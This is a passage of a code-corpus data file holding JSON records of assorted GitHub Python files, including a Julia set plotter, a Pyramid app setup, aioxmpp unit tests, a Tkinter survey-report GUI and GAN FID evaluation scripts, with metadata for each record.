'\r\n 'Please set you complex number (The Origin function is : F(z) = z^2 + c)(Note that the max iterations is 1000')\r\nc = complex(input())\r\nprint(\"Programmed by Mockingbird\")\r\ntime.sleep(2)\r\n\r\n# Parameters\r\nx_res, y_res = 300, 300\r\nxmin, xmax = -1.5, 1.5\r\nwidth = xmax - xmin\r\nymin, ymax = -1.5, 1.5\r\nheight = ymax - ymin\r\n\r\nmax_iter = 1000\r\n\r\nbetta = (1 + cmath.sqrt(1 + 4 * (c.real * c.real + c.imag * c.imag))) / 2\r\nbetta = betta.real\r\nz_abs_max = betta\r\njulia_set(c)\r\n","repo_name":"Mockingbird2k/Computational-Physics","sub_path":"Simulation series 2/1/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74501206771","text":"from pyramid.config import Configurator\n\n\ndef main(global_config, **settings):\n \"\"\" This function returns a Pyramid WSGI application.\n \"\"\"\n with Configurator(settings=settings) as config:\n #Set up Caching\n if not \"cache.regions\" in settings:\n #Set default cache regions (if not set)\n settings[\"cache.regions\"] = \"default_term, second, short_term, long_term\"\n config.include('.lib.caching')\n #Setup Views\n config.include('.views')\n #Scan for decorator configs\n config.scan()\n\n return config.make_wsgi_app()\n","repo_name":"belasin/alookup","sub_path":"alookup/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74497646451","text":"\"\"\"\nКрасота спасёт мир\nОдно из древних поверий гласит, что \nтрёхзначное число красиво, если \nсумма его минимальной и максимальной цифр равна оставшейся цифре умноженной на 2.\n\nНапишите систему определяющую красоту числа.\n\nФормат ввода\nОдно трёхзначное число\n\nФормат вывода\nYES — если число красивое, иначе — NO\n\nПример 1\nВвод\n123\nВывод\nYES\nПример 2\nВвод\n748\nВывод\nNO\n\"\"\"\n\nnumber = input()\n\narray = sorted([int(number[0]), int(number[1]), int(number[2])])\n\nif array[0] + array[2] == array[1] * 2:\n print(\"YES\")\nelse:\n print(\"NO\")","repo_name":"Palex068/PythonData","sub_path":"PythonYandex/2.2/K.py","file_name":"K.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"69914633014","text":"import pickle \nimport re\nimport os \nimport numpy as np\nfrom vectorizer import vect \n\nif __name__ == \"__main__\": \n cur_dir = os.path.dirname(__file__)\n clf = pickle.load(open(os.path.join(cur_dir,'pkl_objects','classifier.pkl'),'rb')) \n label ={0:'negative',1:'positive'}\n example = ['I love this movie'] \n X = vect.transform(example) \n print(\"Movie review: %s\" % example)\n print('Prediction: %s\\nProbability: %.2f%%' % (label[clf.predict(X)[0]],np.max(clf.predict_proba(X))*100)) \n \n example = ['I hate this movie'] \n X = vect.transform(example) \n print(\"Movie review: %s\" % example)\n print('Prediction: %s\\nProbability: %.2f%%' % (label[clf.predict(X)[0]],np.max(clf.predict_proba(X))*100))\n\n ","repo_name":"Krish-Mahajan/amazon-movie-reviews","sub_path":"movieclassifier/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32685044456","text":"########################################################################\n# File name: test_rfc6120.py\n# This file is part 
of: aioxmpp\n#\n# LICENSE\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program. If not, see\n# <http://www.gnu.org/licenses/>.\n#\n########################################################################\nimport unittest\n\nimport aioxmpp.rfc6120 as rfc6120\nimport aioxmpp.stanza as stanza\nimport aioxmpp.structs as structs\nimport aioxmpp.nonza as nonza\nimport aioxmpp.xso as xso\n\nfrom aioxmpp.utils import namespaces\n\n\nclass TestBindFeature(unittest.TestCase):\n def test_registered_at_StreamFeatures(self):\n self.assertIn(\n rfc6120.BindFeature.TAG,\n nonza.StreamFeatures.CHILD_MAP\n )\n\n\nclass TestBind(unittest.TestCase):\n def test_declare_ns(self):\n self.assertDictEqual(\n rfc6120.Bind.DECLARE_NS,\n {\n None: namespaces.rfc6120_bind,\n }\n )\n\n def test_tag(self):\n self.assertEqual(\n rfc6120.Bind.TAG,\n (namespaces.rfc6120_bind, \"bind\")\n )\n\n def test_jid(self):\n self.assertIsInstance(\n rfc6120.Bind.jid,\n xso.ChildText\n )\n self.assertEqual(\n rfc6120.Bind.jid.tag,\n (namespaces.rfc6120_bind, \"jid\")\n )\n self.assertIsInstance(\n rfc6120.Bind.jid.type_,\n xso.JID\n )\n self.assertIs(\n rfc6120.Bind.jid.default,\n None\n )\n\n def test_resource(self):\n self.assertIsInstance(\n rfc6120.Bind.resource,\n xso.ChildText\n )\n self.assertEqual(\n rfc6120.Bind.resource.tag,\n (namespaces.rfc6120_bind, \"resource\")\n )\n self.assertIs(\n rfc6120.Bind.resource.default,\n None\n )\n\n def test_default_init(self):\n obj = rfc6120.Bind()\n self.assertIsNone(obj.jid)\n self.assertIsNone(obj.resource)\n\n def test_init(self):\n jid = structs.JID.fromstr(\"foo@bar.example\")\n obj = rfc6120.Bind(\n jid=jid,\n resource=\"foobar\"\n )\n self.assertEqual(\n jid,\n obj.jid)\n self.assertEqual(\n \"foobar\",\n obj.resource)\n\n def test_registered_at_IQ(self):\n self.assertIn(\n rfc6120.Bind.TAG,\n stanza.IQ.CHILD_MAP\n )\n","repo_name":"horazont/aioxmpp","sub_path":"tests/test_rfc6120.py","file_name":"test_rfc6120.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"21"} +{"seq_id":"73315779574","text":"import cv2\nimport os\n\n\ndef extract_frames(video_path, frames_file, output_dir):\n # Create the output directory if it doesn't exist\n os.makedirs(output_dir, exist_ok=True)\n\n # Read the video\n video = cv2.VideoCapture(video_path)\n\n # Check if the video is successfully opened\n if not video.isOpened():\n print(f\"Failed to open video: {video_path}\")\n return\n\n # Read the frames file\n with open(frames_file, 'r') as f:\n frames_list = [int(os.path.splitext(frame.strip())[0].split('_')[-1]) + 1 for frame in f.readlines()]\n\n # Extract the selected frames\n frame_counter = 0\n frame_id = 0\n\n while True:\n success, frame = video.read()\n\n if not success:\n break\n\n if frame_counter == frames_list[frame_id]:\n # Save the extracted frame as an image\n frame_output_path = os.path.join(output_dir, f\"v2frame_{frame_counter - 
1:06d}.jpg\")\n cv2.imwrite(frame_output_path, frame)\n\n # Move to the next frame in the list\n frame_id += 1\n\n # Break the loop if all frames have been extracted\n if frame_id >= len(frames_list):\n break\n\n frame_counter += 1\n\n # Release the video capture\n video.release()\n\n\n# Path to the video file\nvideo_path = './v2.mp4'\n\n# Path to the text file containing the list of frames to extract\nframes_file = './sorted_file.txt'\n\n# Directory to save the extracted frames\noutput_dir = './data/images'\n\n# Extract the frames\nextract_frames(video_path, frames_file, output_dir)","repo_name":"RohaanA/-VTX-Experiencing-Tennis-Virtually-in-3D-from-2D-Stream","sub_path":"Trainer/ImageExtractor.py","file_name":"ImageExtractor.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72355776372","text":"\r\n# 1\r\ndef fact(n):\r\n if n == 0:\r\n return 1\r\n else:\r\n return n * fact(n-1)\r\n\r\n\r\n# 2\r\n# Use stack to simulate recursion.\r\n\r\nfrom stack import Stack\r\n\r\ndef print_num_use_stack(n):\r\n s = Stack()\r\n while n > 0:\r\n s.push(n)\r\n n -= 1\r\n while not s.is_empty():\r\n print(s.pop())","repo_name":"zwMargaretProject/BigW","sub_path":"dataStructures/recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12317088156","text":"import json\nimport pandas as pd\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport seaborn as sns\npages = [filename for filename in os.listdir('.') if filename.startswith(\"page\")]\n\nall_reports = []\nfor page in pages:\n with open(page) as f:\n json_reports = json.load(f)\n f.close()\n reports = json_reports['data']['worldData']['encounter']['characterRankings']\n reports = pd.json_normalize(data=reports, record_path=['rankings','gear'], meta=[['rankings', 'amount'],['rankings', 'name'],['rankings', 'duration']])\n # Now we are only interested in the 15th slot which is the main hand\n reports = reports.iloc[15::18,:]\n # We can drop some irrelevant columns\n wanted_columns = ['name','id','rankings.amount','rankings.name','rankings.duration']\n reports = reports[wanted_columns]\n all_reports.append(reports)\n\n# Now we need to get the weapon speed of each item. 
We get a json-database of items.\nreports = pd.concat(all_reports)\nwith open('./item_data.json') as f:\n json_items = json.load(f)\n f.close()\nitems = pd.json_normalize(json_items)\n# We filter out only the weapons and rename itemId to id so it can be merged with report.\n# Since the weapon speed is contained in the tooltip we need to keep that as well.\nweapons = items[items['class'] == 'Weapon']\nweapons = weapons.rename(columns={'itemId':'id'})\nweapons = weapons[['id','tooltip']]\n# We need to drop Elune's candle since it has no speed.\nweapons = weapons.drop(index=weapons[weapons.id == 21713].index)\n# Then we extract the speeds.\ndef format_label(label):\n speed = label[6:]\n if(len(speed) > 0):\n return float(speed)\n else:\n return np.nan\nextract_speed = lambda tooltips : [format_label(t['label']) for t in tooltips if 'Speed ' in t['label']][0]\nweapons.tooltip = weapons.tooltip.apply(extract_speed)\nweapons = weapons.rename(columns={'tooltip':'speed'})\n\n# Then we merge it with the reports, so now we have a dps measure and main hand weapon speed for each player in the top rankings.\n# We need to make sure that the dps is in right format as well.\nreports = reports.rename(columns={'rankings.amount':'dps', 'rankings.duration':'duration'})\nreports.dps = reports.dps.apply(float)\nreports.duration = reports.duration.apply(float)\nreports = reports.dropna()\nreports.id = reports.id.apply(int)\nreports = reports.merge(weapons)\nplt.figure()\nsns.boxplot(data=reports, x='speed', y='dps')\nplt.savefig(\"lala\")\nplt.close()\n","repo_name":"vonpost/wcl-analysis","sub_path":"wcl-api.py","file_name":"wcl-api.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5757794759","text":"from odoo import models\n\n\nclass AccountMoveReversal(models.TransientModel):\n _inherit = \"account.move.reversal\"\n\n def reverse_moves(self):\n \"\"\"Link return moves to the lines of refund invoice\"\"\"\n action = super().reverse_moves()\n if \"res_id\" in action:\n moves = self.env[\"account.move\"].browse(action[\"res_id\"])\n else:\n moves = self.env[\"account.move\"].search(action[\"domain\"])\n for line in moves.mapped(\"invoice_line_ids\"):\n reverse_moves = line.move_line_ids.mapped(\"returned_move_ids\")\n if reverse_moves:\n line.move_line_ids = reverse_moves\n return action\n","repo_name":"intisoft22/2023-Triyudha","sub_path":"stock_picking_invoice_link/wizards/account_move_reversal.py","file_name":"account_move_reversal.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1746036778","text":"# Напишите программу, которая на вход принимает 5 чисел и находит максимальное из них.\n\n# Примеры:\n# -> 1, 4, 8, 7, 5 --> 8\n# -> 78, 55, 36, 90, 2 --> 90\n\n# y = [1, 15, -136, 4, 98]\n# print(y)\n# m = y[0]\n\n# for i in y:\n# if i > m:\n# m = i\n\n# print(f\"--> {m}\")\n\n# заполняем список \na=[] # Создаем пустой список \nfor i in range(5):\n k=int(input(\" Введите число --> \"))\n a.append(k)\n\nmax=a[0]\nfor i in a:\n if i>max:\n max=i\nprint(f\" Максимальное число --> {max}\") ","repo_name":"vyky1983/Python","sub_path":"Уроки Python/Syminar/Sym1/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3733661802","text":"import os\nimport fnmatch\n\nimport tkinter as tk\nfrom 
tkinter import ttk\nfrom tkinter import filedialog\n\nclass ScoresToplineView(ttk.Frame):\n\tdef __init__(self, parent, controller):\n\t\tsuper().__init__(parent)\n\t\tself.parent = parent\n\t\tself.controller = controller\n\n\t\t# create widgets\n\t\t# path_to_csv, round, location\n\t\t# input file path\n\t\tself.input_label = ttk.Label(self, text='Path to input file:', justify=tk.RIGHT, anchor=\"e\")\n\t\tself.input_label.grid(sticky = tk.E, row=1, column=0)\n\t\t\n\t\tself.input_var = tk.StringVar()\n\t\tself.input_entry = ttk.Entry(self, textvariable=self.input_var, width=30)\n\t\tself.input_entry.grid(row=1, column=1, sticky=tk.NSEW)\n\t\t\n\t\tself.input_button = ttk.Button(self, text='Open', command=self.input_button_clicked)\n\t\tself.input_button.grid(row=1, column=2, padx=10)\n\t\t\n\t\tself.input_message = ttk.Label(self, text='', foreground='red')\n\t\tself.input_message.grid(row=1, column=3, sticky=tk.W)\n\n\t\t# round selection\n\t\tself.round_label = ttk.Label(self, text='Round number:', justify=tk.RIGHT, anchor=\"e\")\n\t\tself.round_label.grid(sticky = tk.E, row=2, column=0)\n\t\t\n\t\tself.round_menu = tk.StringVar()\n\t\tself.round_menu.set(\"Pick a round number:\")\n\t\t\n\t\trounds = list(range(1,51))\n\t\t\n\t\tself.round_dropdown = tk.OptionMenu(self, self.round_menu, *rounds, command=self.round_menu_clicked)\n\t\tself.round_dropdown.grid(row=2, column=1, sticky=tk.E)\n\t\t\n\t\tself.round_message = ttk.Label(self, text='', foreground='red')\n\t\tself.round_message.grid(row=2, column=3, sticky=tk.W)\n\t\t\n\t\t# location\n\t\tself.state_dict = { \"Alabama\": \"AL\", \"Alaska\": \"AK\", \"Arizona\": \"AZ\", \"Arkansas\": \"AR\", \"California\": \"CA\", \"Colorado\": \"CO\", \"Connecticut\": \"CT\", \"Delaware\": \"DE\", \"District of Columbia\": \"DC\", \"Florida\": \"FL\", \"Georgia\": \"GA\", \"Hawaii\": \"HI\", \"Idaho\": \"ID\", \"Illinois\": \"VI\", \"Indiana\": \"WA\", \"Iowa\": \"WV\", \"Kansas\": \"KS\", \"Kentucky\": \"KY\", \"Louisiana\": \"LA\", \"Maine\": \"ME\", \"Maryland\": \"MD\", \"Massachusetts\": \"MA\", \"Michigan\": \"MI\", \"Minnesota\": \"MN\", \"Mississippi\": \"MS\", \"Missouri\": \"MO\", \"Montana\": \"MT\", \"Nebraska\": \"NE\", \"Nevada\": \"NV\", \"New Hampshire\": \"NH\", \"New Jersey\": \"NJ\", \"New Mexico\": \"NM\", \"New York\": \"IL\", \"North Carolina\": \"IN\", \"North Dakota\": \"ND\", \"Ohio\": \"OH\", \"Oklahoma\": \"OK\", \"Oregon\": \"OR\", \"Pennsylvania\": \"PA\", \"Rhode Island\": \"RI\", \"South Carolina\": \"SC\", \"South Dakota\": \"SD\", \"Tennessee\": \"TN\", \"Texas\": \"TX\", \"Utah\": \"UT\", \"Vermont\": \"VT\", \"Virginia\": \"VA\", \"Washington\": \"NY\", \"West Virginia\": \"NC\", \"Wisconsin\": \"WI\", \"Wyoming\": \"WY\"}\n\t\t\n\t\tself.location_label = ttk.Label(self, text='Location:', justify=tk.RIGHT, anchor=\"e\")\n\t\tself.location_label.grid(sticky=tk.E, row=3, column=0)\n\t\t\n\t\tself.location_menu = tk.StringVar()\n\t\tself.location_menu.set(\"Pick a location:\")\n\t\t\n\t\tself.location_dropdown = tk.OptionMenu(self, self.location_menu, *self.state_dict.keys(), command=self.location_menu_clicked)\n\t\tself.location_dropdown.grid(row=3, column=1, sticky=tk.E)\n\n\t\tself.location_message = ttk.Label(self, text='', foreground='red')\n\t\tself.location_message.grid(row=3, column=3, sticky=tk.W)\n\t\t\n\t\t# output\n\t\tself.output_label = ttk.Label(self, text='Save as:', justify=tk.RIGHT, anchor=\"e\")\n\t\tself.output_label.grid(sticky = tk.E, row=4, column=0)\n\t\t\n\t\tself.output_var = 
tk.StringVar()\n\t\tself.output_entry = ttk.Entry(self, textvariable=self.output_var, width=30)\n\t\tself.output_entry.grid(row=4, column=1, sticky=tk.NSEW)\n\t\t\n\t\tself.output_button = ttk.Button(self, text='Save as', command=self.output_button_clicked)\n\t\tself.output_button.grid(row=4, column=2, padx=10)\n\t\t\n\t\tself.output_message = ttk.Label(self, text='', foreground='red')\n\t\tself.output_message.grid(row=4, column=3, sticky=tk.W)\n\n\t\t# submit\t\t\n\t\tself.submit_button = ttk.Button(self, text='Submit', command=self.submit_button_clicked)\n\t\tself.submit_button.grid(row=5, column=2, pady=15, padx=10)\n\t\t\n\t\tself.submit_message = ttk.Label(self, text='', foreground='blue')\n\t\tself.submit_message.grid(row=5, column=1, sticky=tk.W)\n\n\tdef show_loading_success(self, message):\n\t\tself.update_idletasks()\n\t\tself.submit_message['foreground'] = 'blue'\n\t\tself.submit_message['text'] = message\n\t\tself.submit_message.after(1000, self.hide_submit_message)\n\n\tdef hide_submit_message(self):\n\t\tself.submit_message['text'] = ''\n\t\tself.parent.destroy()\n\n\tdef show_loading_error(self, message):\n\t\tself.update_idletasks()\n\t\tself.submit_message['foreground'] = 'red'\n\t\tself.submit_message['text'] = message\n\n\tdef input_button_clicked(self):\n\t\t\"\"\"\n\t\tHandle input button click event\n\t\t:return:\n\t\t\"\"\"\n\t\tfilename = filedialog.askopenfilename(title='Open an input file', initialdir='~/', filetypes=[('Comma-Separated File', '*.csv')])\n\t\tif filename:\n\t\t\tself.input_entry['state'] = \"normal\"\n\t\t\tself.input_entry.delete(0,tk.END)\n\t\t\tself.input_entry.insert(0,filename)\n\t\t\tself.check_input()\n\n\tdef show_input_error(self, message):\n\t\t\"\"\"\n\t\tShow an error message\n\t\t:param message:\n\t\t:return:\n\t\t\"\"\"\n\t\tself.update_idletasks()\n\t\tself.input_message['text'] = message\n\t\tself.input_message['foreground'] = 'red'\n\n\t\n\tdef hide_input_error(self):\n\t\t\"\"\"\n\t\thide an error message\n\t\t:param message:\n\t\t:return:\n\t\t\"\"\"\n\t\tself.input_message['text'] = ''\n\t\t\n\tdef round_menu_clicked(self, event):\n\t\t# if clicked at all - user forced to pick dropdown item\n\t\t# if error message on screen, remove\n\t\tself.round_message['text'] = ''\n\t\n\tdef show_round_error(self, message):\n\t\tself.update_idletasks()\n\t\tself.round_message['text'] = message\n\t\tself.round_message['foreground'] = 'red'\n\t\t\n\tdef hide_round_error(self):\n\t\tself.round_message['text'] = ''\n\n\tdef check_round(self):\n\t\t# check if round was selected\n\t\tif self.round_menu.get() == \"Pick a round number:\":\n\t\t\tself.show_round_error(\"Please select a number.\")\n\t\telse:\n\t\t\tself.hide_round_error()\n\t\t\treturn True\n\t\t\n\t\treturn False\n\n\tdef location_menu_clicked(self, event):\n\t\t# if clicked at all - user forced to pick dropdown item\n\t\t# if error message on screen, remove\n\t\tself.location_message['text'] = ''\n\t\n\tdef show_location_error(self, message):\n\t\tself.update_idletasks()\n\t\tself.location_message['text'] = message\n\t\tself.location_message['foreground'] = 'red'\n\t\t\n\tdef hide_location_error(self):\n\t\tself.location_message['text'] = ''\n\n\tdef check_location(self):\n\t\t# check if location was selected\n\t\tif self.location_menu.get() == \"Pick a location:\":\n\t\t\tself.show_location_error(\"Please select a location.\")\n\t\telse:\n\t\t\tself.hide_location_error()\n\t\t\treturn True\n\t\t\n\t\treturn False\n\n\tdef output_button_clicked(self):\n\t\t\"\"\"\n\t\tHandle output 
button click event\n\t\t:return:\n\t\t\"\"\"\n\t\tfilename = filedialog.asksaveasfilename(title='Save report', initialdir='~/', filetypes=[('Microsoft Excel', '*.xlsx')])\n\t\tif filename:\n\t\t\tself.output_entry['state'] = \"normal\"\n\t\t\tself.output_entry.delete(0,tk.END)\n\t\t\tself.output_entry.insert(0,filename)\n\t\t\tself.check_output()\n\n\tdef show_output_error(self, message):\n\t\t\"\"\"\n\t\tShow an error message\n\t\t:param message:\n\t\t:return:\n\t\t\"\"\"\n\t\tself.update_idletasks()\n\t\tself.output_message['text'] = message\n\t\tself.output_message['foreground'] = 'red'\n\n\t\n\tdef hide_output_error(self):\n\t\t\"\"\"\n\t\thide an error message\n\t\t:param message:\n\t\t:return:\n\t\t\"\"\"\n\t\tself.output_message['text'] = ''\n\n\tdef check_input(self):\n\t\t# check if input file path exists\n\t\tif not os.path.exists(self.input_entry.get()):\n\t\t\tself.show_input_error(\"This path does not exist.\")\n\t\telse:\n\t\t\tself.hide_input_error()\n\t\t\t\n\t\t\t# check the extension\n\t\t\tif not fnmatch.fnmatch(os.path.join(self.input_entry.get()), \"*.csv\"):\n\t\t\t\tself.show_input_error(\"Comma-separated files (.csv) only.\")\n\t\t\telse:\n\t\t\t\tself.hide_input_error()\n\t\t\t\treturn True\n\t\t\n\t\treturn False\n\n\tdef check_output(self):\n\t\t# check if directory exists\n\t\tif not os.path.isdir(os.path.dirname(os.path.join(self.output_var.get()))):\n\t\t\tself.show_output_error(\"This path does not exist.\")\n\t\telse:\n\t\t\tself.hide_output_error()\n\t\t\t\n\t\t\t# check the extension\n\t\t\tif not fnmatch.fnmatch(os.path.join(self.output_var.get()), \"*.xlsx\"):\n\t\t\t\tself.show_output_error(\"Microsoft Excel (.xlsx) only.\")\n\t\t\telse:\n\t\t\t\tself.hide_output_error\n\t\t\t\treturn True\n\t\t\n\t\treturn False\n\n\tdef submit_button_clicked(self):\n\t\t\"\"\"\n\t\tHandle submit button click event\n\t\t:return:\n\t\t\"\"\"\n\t\t# check all entry variables for valid paths/exts\n\t\t# we do global check on variables so all input errors can be shown at once\n\t\tself.check_input()\n\t\tself.check_round()\n\t\tself.check_location()\n\t\tself.check_output()\n\t\t\n\t\t# ask if we're ready to be submitted\n\t\t# here we stack checks based on priority for report\n\t\t\n\t\t# for appendix, all input fields need to be filled out for report to run\n\t\tif self.check_input():\n\t\t\tif self.check_round():\n\t\t\t\tif self.check_location():\n\t\t\t\t\tif self.check_output():\n\t\t\t\t \t\tinput_path = os.path.join(self.input_entry.get())\n\t\t\t\t \t\tinput_round = int(self.round_menu.get())\n\t\t\t\t \t\tinput_location = self.state_dict.get(self.location_menu.get())\n\t\t\t\t \t\toutput_path = os.path.join(self.output_entry.get())\n\t\t\t\t \t\t# ask controller to run files\n\t\t\t\t \t\tself.controller.run_scores_topline(input_path, input_round, input_location, output_path)","repo_name":"scottriding/internbot","sub_path":"internbot/view/rnc_view/scores_topline_view/scores_topline_view.py","file_name":"scores_topline_view.py","file_ext":"py","file_size_in_byte":8950,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"27426993407","text":"import os\nimport pandas as pd\nimport torch\nfrom Data_loader import *\nfrom WGAN_models import WGAN\nfrom DCGAN_models import DCGAN\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sb\nfrom Dataset.CIFAR_dataloader import test_loader as cifar_test_loader\nimport torch\nfrom torchmetrics.image.fid import FrechetInceptionDistance\ndevice = 'cuda' 
if torch.cuda.is_available() else 'cpu'\n# fid = FrechetInceptionDistance().to(device)\nfid = FrechetInceptionDistance()\ndef get_fid(real_images, fake_images):\n '''\n Takes real image batch and generated 'fake' image batch\n Returns FID score, using the pytorch.metrics package\n '''\n # add 2 extra channels for MNIST (as required by InceptionV3\n if real_images.shape[1] != 3:\n real_images = torch.cat([real_images, real_images, real_images], 1)\n if fake_images.shape[1] != 3:\n fake_images = torch.cat([fake_images, fake_images, fake_images], 1)\n\n # if images not uint8 format, convert them (required format by fid model)\n if real_images.dtype != torch.uint8 or fake_images.dtype != torch.uint8:\n real_images = real_images.type(torch.ByteTensor)\n fake_images = fake_images.type(torch.ByteTensor)\n\n fid.update(real_images, real=True) # <--- currently running out of memory here\n fid.update(fake_images, real=False)\n return fid.compute().item()\n\n\ntrain_dataset = {\n \"CIFAR\":train_loader_cifar,\n \"MNIST\":train_loader_mnist,\n \"FashionMNIST\":train_loader_fashionmnist,\n}\n\ndef get_fid_score(dcgan = False, ResNet=False, gradient_penalty=False, spectral_norm=False, train_set='FashionMNIST', iter=0):\n if dcgan:\n GAN = DCGAN(ResNet=ResNet, train_set=train_set, iter=iter)\n epoch, iter, G_losses, fid_score, best_fid, Fake_losses, Real_losses = GAN.load_results()\n else:\n GAN = WGAN(ResNet=ResNet, gradient_penalty=gradient_penalty, spectral_norm=spectral_norm, train_set=train_set, iter=iter)\n epoch, iter, G_losses, fid_score, best_fid, Fake_losses, Real_losses = GAN.load_results()\n print(epoch)\n return np.array(fid_score).mean(), np.min(np.array(fid_score)), fid_score[-1], np.array(fid_score), \\\n np.array(G_losses), np.array(Real_losses), np.array(Fake_losses)\n\ndef get_fid_scores(model = 'DCGAN', dataset = 'MNIST', ii = 20):\n fid_scores_mean = []\n fid_scores_min = []\n fid_scores_last = []\n fid_scores = []\n G_losses = []\n Real_losses = []\n Fake_losses = []\n dcgan = False\n spectral_norm = False\n if model == 'DCGAN':\n dcgan = True\n if model == 'SN_WGAN':\n spectral_norm = True\n for i in range(ii):\n try:\n fid_score_mean, fid_score_min, fid_score_last, fid_score, G_loss, Real_loss, Fake_loss= get_fid_score(dcgan=dcgan, ResNet=False, gradient_penalty=False,\n spectral_norm=spectral_norm, train_set=dataset, iter=i)\n fid_scores_mean.append(fid_score_mean)\n fid_scores_min.append(fid_score_min)\n fid_scores_last.append(fid_score_last)\n fid_scores.append(fid_score[:50])\n G_losses.append(G_loss)\n Real_losses.append(Real_loss)\n Fake_losses.append(Fake_loss)\n except:\n pass\n fid_scores_mean = np.array(fid_scores_mean)\n fid_scores_min = np.array(fid_scores_min)\n fid_scores_last = np.array(fid_scores_last)\n fid_scores = np.array(fid_scores)\n G_losses = np.array(G_losses)\n Real_losses = np.array(Real_losses)\n Fake_losses = np.array(Fake_losses)\n MKDIR(\"Figure\")\n MKDIR(\"Figure/\"+model+\"/\")\n MKDIR(\"Figure/\"+model+\"/\"+dataset+\"/\")\n np.save(\"Figure/\"+model+\"/\"+dataset+\"/fid_scores_mean.npy\", fid_scores_mean)\n np.save(\"Figure/\"+model+\"/\"+dataset+\"/fid_scores_min.npy\", fid_scores_min)\n np.save(\"Figure/\" + model + \"/\" + dataset + \"/fid_scores_last.npy\", fid_scores_last)\n np.save(\"Figure/\" + model + \"/\" + dataset + \"/fid_scores.npy\", fid_scores)\n np.save(\"Figure/\" + model + \"/\" + dataset + \"/G_losses.npy\", G_losses)\n np.save(\"Figure/\" + model + \"/\" + dataset + \"/Real_losses.npy\", Real_losses)\n np.save(\"Figure/\" + 
model + \"/\" + dataset + \"/Fake_losses.npy\", Fake_losses)\n\ndef save_results():\n models = ['DCGAN', 'WGAN', 'SN_WGAN']\n train_sets = ['CIFAR', 'MNIST', 'FashionMNIST']\n for model in models:\n for train_set in train_sets:\n get_fid_scores(model, train_set)\n\ndef show_fid_score(train_set='CIFAR', iter=40000):\n ii = int(iter / 200)\n path = \"Figure/\"+'SN_WGAN'+\"/\"+train_set+\"/\"+\"/fid_scores.npy\"\n snwgan_fid = np.load(path, allow_pickle=True)\n snwgan_fid = snwgan_fid.mean(axis=0)[:ii]\n path = \"Figure/\" + 'WGAN' + \"/\" + train_set + \"/\" + \"/fid_scores.npy\"\n wgan_fid = np.load(path, allow_pickle=True)\n wgan_fid = wgan_fid.mean(axis=0)[:ii]\n path = \"Figure/\" + 'DCGAN' + \"/\" + train_set + \"/\" + \"/fid_scores.npy\"\n dcgan_fid = np.load(path, allow_pickle=True)\n dcgan_fid = dcgan_fid.mean(axis=0)[:ii]\n x1 = np.linspace(0, iter, ii)\n y1 = snwgan_fid\n l1 = plt.plot(x1, y1, 'b--', label='Spectral Normalization WGAN')\n x2 = np.linspace(0, iter, ii)\n y2 = wgan_fid\n l2 = plt.plot(x2, y2, 'g--', label='WGAN')\n x3 = np.linspace(0, iter, ii)\n y3 = dcgan_fid\n l3 = plt.plot(x3, y3, 'r--', label='DCGAN')\n plt.title('FID scores')\n plt.xlabel('iteration')\n plt.ylabel('fid score')\n plt.legend()\n plt.show()\n\ndef show_Generator_Losses(dcgan = True, gradient_penalty=False, spectral_norm=False, train_set='CIFAR', iter=0):\n title = ''\n path = \"Figure/\"\n if dcgan:\n title += \"DCGAN \"\n model = \"DCGAN/\"\n else:\n title += \"WGAN \"\n model = \"WGAN/\"\n if spectral_norm:\n title = \"Spectral Norm \" + title\n model = \"SN_\" + model\n if gradient_penalty:\n title = \"Gradient Penalty \" + title\n path += model + train_set + '/' + \"G_losses.npy\"\n G_losses = np.load(path, allow_pickle=True)[iter]\n if train_set == \"CIFAR\":\n iter = 40000\n else:\n iter = 10000\n # Generator loss\n x1 = np.linspace(0, iter, G_losses.shape[0])\n y1 = np.array(G_losses)\n g_loss = plt.plot(x1, y1, 'r--', label='Generator Loss')\n plt.title(title + 'Generator Loss')\n plt.xlabel('iteration')\n plt.ylabel('Generator Loss')\n plt.legend()\n plt.show()\n\ndef show_Discriminator_Losses(dcgan = False, gradient_penalty=False, spectral_norm=True, train_set='CIFAR', iter=0):\n title = ''\n path = \"Figure/\"\n if dcgan:\n title += \"DCGAN \"\n model = \"DCGAN/\"\n else:\n title += \"WGAN \"\n model = \"WGAN/\"\n if spectral_norm:\n title = \"Spectral Norm \" + title\n model = \"SN_\" + model\n if gradient_penalty:\n title = \"Gradient Penalty \" + title\n path += model + train_set + '/'\n Fake_losses = np.load(path + \"Fake_losses.npy\", allow_pickle=True)[iter]\n Real_losses 